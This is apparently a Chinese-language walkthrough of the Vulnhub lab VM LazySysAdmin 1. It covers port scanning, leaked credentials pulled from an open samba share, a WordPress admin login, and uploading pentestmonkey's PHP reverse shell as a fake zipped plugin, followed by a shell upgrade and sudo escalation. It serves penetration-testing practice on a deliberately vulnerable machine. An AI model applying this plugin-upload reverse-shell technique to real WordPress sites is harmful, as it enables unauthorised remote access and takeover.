Vulnhub靶机:LAZYSYSADMIN_ 1

目录

  • 介绍
  • 信息收集
  • 测试 samba 安全
  • 登录网站
  • zip自解压拿webshell
  • 提权

介绍

系列:LazySysAdmin(此系列共1台)
发布日期:2017 年 9 月 20 日
难度:初级
运行环境:VMware Workstation
目标:取得Root权限
学习:

  • samba敏感信息泄露
  • wordpress挂马

靶机地址:https://www.vulnhub.com/entry/lazysysadmin-1,205/

信息收集

netdiscover主机发现

sudo netdiscover -i eth0 -r 192.168.229.0/24

主机信息探测
发现SSH运行在777端口

nmap -p- 192.168.229.144
nmap -p 22,80,139,445,3306,6667 -A 192.168.229.144
nmap -p 22,80,139,445,3306,6667 --script=vuln 192.168.229.144

测试 samba 安全

发现了一个有只读权限的共享目录,使用空口令登录进去。结果发现了很多文件目录。

smbmap -H 192.168.229.144
smbclient //192.168.229.144/share$


使用get,把自己感兴趣的文件下载下来

通过配置文件找到一个账号密码:Admin/TogieMYSQL12345^^

此外还有一个密码:12345

登录网站

网站首页是一个静态页面,没什么有价值的信息。
Vulnhub靶机:LAZYSYSADMIN_ 1_第1张图片
简单的目录爆破,发现了wordpress:dirsearch -u http://192.168.229.144/ --full-url -x 404,403
页面上的内容一直在告诉我们,他叫togie,那接下来就试试登录吧。
Vulnhub靶机:LAZYSYSADMIN_ 1_第2张图片
访问默认后台地址:http://192.168.229.144/wordpress/wp-admin
使用Admin/TogieMYSQL12345^^登录成功
Vulnhub靶机:LAZYSYSADMIN_ 1_第3张图片
攻击者往往通过插件功能反弹shell,下面开始演示WordPress拿shell的一个流程
Vulnhub靶机:LAZYSYSADMIN_ 1_第4张图片

zip自解压拿webshell

  1. 下载反弹shell的文件

https://pentestmonkey.net/tools/web-shells/php-reverse-shell
Vulnhub靶机:LAZYSYSADMIN_ 1_第5张图片

wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
gunzip php-reverse-shell-1.0.tar.gz
tar xvf php-reverse-shell-1.0.tar
cp php-reverse-shell-1.0/php-reverse-shell.php ./
vim php-reverse-shell.php
zip sh.zip php-reverse-shell.php

这个文件,kali已经内置了,位于:/usr/share/webshells/php/php-reverse-shell.php

  1. 编辑文件

设置反弹shell的地址和端口
Vulnhub靶机:LAZYSYSADMIN_ 1_第6张图片
编辑虚假的插件的头文件,这一步可做可不做。

  1. 安装插件

Vulnhub靶机:LAZYSYSADMIN_ 1_第7张图片
显示安装成功
Vulnhub靶机:LAZYSYSADMIN_ 1_第8张图片

  1. 获取shell
http://192.168.229.144/wordpress/wp-content/plugins/sh/php-reverse-shell.php

提权

首先修复一下shell:

python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm-color

发现可以提权到togie,然后就是sudo提权了。

你可能感兴趣的:(靶机,Vulnhub)